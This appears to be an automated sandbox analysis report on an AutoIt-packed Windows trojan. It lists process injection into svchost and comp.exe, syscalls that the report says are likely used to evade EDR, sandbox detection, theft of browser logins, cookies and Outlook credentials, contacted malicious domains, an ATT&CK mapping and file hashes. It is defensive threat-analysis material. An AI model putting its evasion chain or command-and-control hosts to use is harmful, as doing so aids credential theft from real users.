                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862F98 mov eax, dword ptr fs:[00000030h]3_2_03862F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832FC8 mov eax, dword ptr fs:[00000030h]3_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832FC8 mov eax, dword ptr fs:[00000030h]3_2_03832FC8
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003B80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_003B80A9
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0038A124 SetUnhandledExceptionFilter,0_2_0038A124
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0038A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0038A155

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtOpenKeyEx: Direct from: 0x77672B9C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtProtectVirtualMemory: Direct from: 0x77672F9C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtCreateFile: Direct from: 0x77672FEC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtOpenFile: Direct from: 0x77672DCC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtTerminateThread: Direct from: 0x77672FCC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtProtectVirtualMemory: Direct from: 0x77667B2E
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtQueryInformationToken: Direct from: 0x77672CAC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtAllocateVirtualMemory: Direct from: 0x77672BEC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtDeviceIoControlFile: Direct from: 0x77672AEC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtQuerySystemInformation: Direct from: 0x776748CC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtQueryAttributesFile: Direct from: 0x77672E6C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtSetInformationThread: Direct from: 0x77672B4C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtOpenSection: Direct from: 0x77672E0C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtQueryVolumeInformationFile: Direct from: 0x77672F2C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtAllocateVirtualMemory: Direct from: 0x776748EC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtSetInformationThread: Direct from: 0x776663F9
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtReadVirtualMemory: Direct from: 0x77672E8C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtCreateKey: Direct from: 0x77672C6C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtWriteVirtualMemory: Direct from: 0x7767490C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtAllocateVirtualMemory: Direct from: 0x77673C9C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtDelayExecution: Direct from: 0x77672DDC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtCreateUserProcess: Direct from: 0x7767371C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtQuerySystemInformation: Direct from: 0x77672DFC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtQueryInformationProcess: Direct from: 0x77672C26
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtResumeThread: Direct from: 0x77672FBC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtReadFile: Direct from: 0x77672ADC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtAllocateVirtualMemory: Direct from: 0x77672BFC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtResumeThread: Direct from: 0x776736AC
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtSetInformationProcess: Direct from: 0x77672C5C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtMapViewOfSection: Direct from: 0x77672D1C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtNotifyChangeKey: Direct from: 0x77673C2C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtWriteVirtualMemory: Direct from: 0x77672E3C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | NtCreateMutant: Direct from: 0x776735CC
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: NULL target: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe protection: read write
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: NULL target: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\comp.exe | Thread register set: target process: 2112
                Source: C:\Windows\SysWOW64\comp.exe | Thread APC queued: target process: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DB4008
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003B87B1 LogonUserW
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_00363B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003C4C27 mouse_event
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SpCuEoekPa.exe"
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | Process created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"
                Source: C:\Windows\SysWOW64\comp.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003B7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003B874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: SpCuEoekPa.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: SpCuEoekPa.exe, OGbZSCDMTTWQqW.exe, 00000006.00000000.1602687184.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151908116.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757710490.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: OGbZSCDMTTWQqW.exe, 00000006.00000000.1602687184.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151908116.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757710490.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: OGbZSCDMTTWQqW.exe, 00000006.00000000.1602687184.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151908116.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757710490.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Manager
                Source: OGbZSCDMTTWQqW.exe, 00000006.00000000.1602687184.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151908116.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757710490.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_0038862B cpuid
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_00394E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003A1E06 GetUserNameW
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_00393F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: SpCuEoekPa.exe, 00000000.00000002.1311195776.0000000001726000.00000004.00000020.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1288401290.00000000016BA000.00000004.00000020.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1288602537.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procmon.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1681689182.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3152822686.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1682428775.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\comp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: SpCuEoekPa.exe | Binary or memory string: WIN_81
                Source: SpCuEoekPa.exe | Binary or memory string: WIN_XP
                Source: SpCuEoekPa.exe | Binary or memory string: WIN_XPe
                Source: SpCuEoekPa.exe | Binary or memory string: WIN_VISTA
                Source: SpCuEoekPa.exe | Binary or memory string: WIN_7
                Source: SpCuEoekPa.exe | Binary or memory string: WIN_8
                Source: SpCuEoekPa.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1681689182.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3152822686.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1682428775.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003D6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003D6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_00397AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 261 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph ID: 1588628 | Sample: SpCuEoekPa.exe | Startdate: 11/01/2025 | Architecture: WINDOWS | Score: 100
                Start node: www.sfantulandrei.info, www.infohive.website, 9 other IPs or domains; Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures
                SpCuEoekPa.exe (started): Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 2 other signatures
                  svchost.exe (started by SpCuEoekPa.exe): Maps a DLL or memory area into another process
                    OGbZSCDMTTWQqW.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
                      comp.exe (started by OGbZSCDMTTWQqW.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                        OGbZSCDMTTWQqW.exe (injected by comp.exe): Found direct / indirect Syscall (likely to bypass EDR); contacts qqa79.top 38.47.233.21 (ports 49974, 80; COGENT-174US United States), www.sfantulandrei.info 13.248.169.48 (ports 49996, 49997, 49998; AMAZON-02US United States), 6 other IPs or domains
                        firefox.exe (started by comp.exe)

                Source | Detection | Scanner | Label
                SpCuEoekPa.exe | 53% | Virustotal |
                SpCuEoekPa.exe | 71% | ReversingLabs | Win32.Trojan.AutoitInject
                SpCuEoekPa.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Contacted domains:

Name                      IP               Active    Malicious   Reputation
qqa79.top                 38.47.233.21     true      true        unknown
webredir.vip.gandi.net    217.70.184.50    true      false       high
www.127358.win            206.238.89.119   true      false       high
www.infohive.website      66.29.149.46     true      true        unknown
dns.ladipage.com          13.228.81.39     true      false       high
www.gk88top.top           172.67.137.47    true      false       high
www.mffnow.info           104.21.64.1      true      false       high
www.sfantulandrei.info    13.248.169.48    true      true        unknown
www.muasamgiare.click     unknown          unknown   false       unknown
www.sunnyz.store          unknown          unknown   false       unknown
www.qqa79.top             unknown          unknown   false       unknown
Contacted IPs:

IP                Domain                    Country          ASN      ASN Name                                          Malicious
38.47.233.21      qqa79.top                 United States    174      COGENT-174US                                      true
13.248.169.48     www.sfantulandrei.info    United States    16509    AMAZON-02US                                       true
172.67.137.47     www.gk88top.top           United States    13335    CLOUDFLARENETUS                                   false
217.70.184.50     webredir.vip.gandi.net    France           29169    GANDI-ASDomainnameregistrar-httpwwwgandinetFR    false
104.21.64.1       www.mffnow.info           United States    13335    CLOUDFLARENETUS                                   false
13.228.81.39      dns.ladipage.com          United States    16509    AMAZON-02US                                       false
66.29.149.46      www.infohive.website      United States    19538    ADVANTAGECOMUS                                    true
206.238.89.119    www.127358.win            United States    174      COGENT-174US                                      false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588628
Start date and time: 2025-01-11 03:30:15 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SpCuEoekPa.exe (renamed because the original name is a hash value)
Original Sample Name: e0ec2a4761f2959631f99efb266eb3aa1c78ea3ed7741c28387143dc9e28fc21.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@8/8
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 47
• Number of non-executed functions: 286
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
                                                          No simulations
Dropped file 1
Process: C:\Windows\SysWOW64\comp.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1211596417522893
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5: 0AB67F0950F46216D5590A6A41A267C7
SHA1: 3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256: 4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512: D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious: false
Reputation: moderate, very likely benign file
                                                          Process:C:\Users\user\Desktop\SpCuEoekPa.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):288256
                                                          Entropy (8bit):7.993346610993587
                                                          Encrypted:true
                                                          SSDEEP:6144:ChETDMF7OgAJ550P0/gheEtkqcXXjZm8fYVWsfUW8/38xXuCl4+IfaDvA:ChETA9Sf03hlkqcXXjg8fs8J/3wuCl4P
                                                          MD5:020460D3CDB5F033F18BCDA0B420DCBC
                                                          SHA1:EB99C89E000690CB1A1ED3ACCA88409CA4B9316B
                                                          SHA-256:29129E12222E1B98E1CDE11FEA819D902107C3F2C979EE7FBD9910A5D51F9AC2
                                                          SHA-512:A4F93865778D534F0FC3B40373A0C16F5C9A72B71BEA17F2E856CEF576B15C6ADD138765BF98E4E2B3F231D6231E01AF43AC203908B3E4E7D0E4263CDFF3F407
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Users\user\Desktop\SpCuEoekPa.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):288256
                                                          Entropy (8bit):7.993346610993587
                                                          Encrypted:true
                                                          SSDEEP:6144:ChETDMF7OgAJ550P0/gheEtkqcXXjZm8fYVWsfUW8/38xXuCl4+IfaDvA:ChETA9Sf03hlkqcXXjg8fs8J/3wuCl4P
                                                          MD5:020460D3CDB5F033F18BCDA0B420DCBC
                                                          SHA1:EB99C89E000690CB1A1ED3ACCA88409CA4B9316B
                                                          SHA-256:29129E12222E1B98E1CDE11FEA819D902107C3F2C979EE7FBD9910A5D51F9AC2
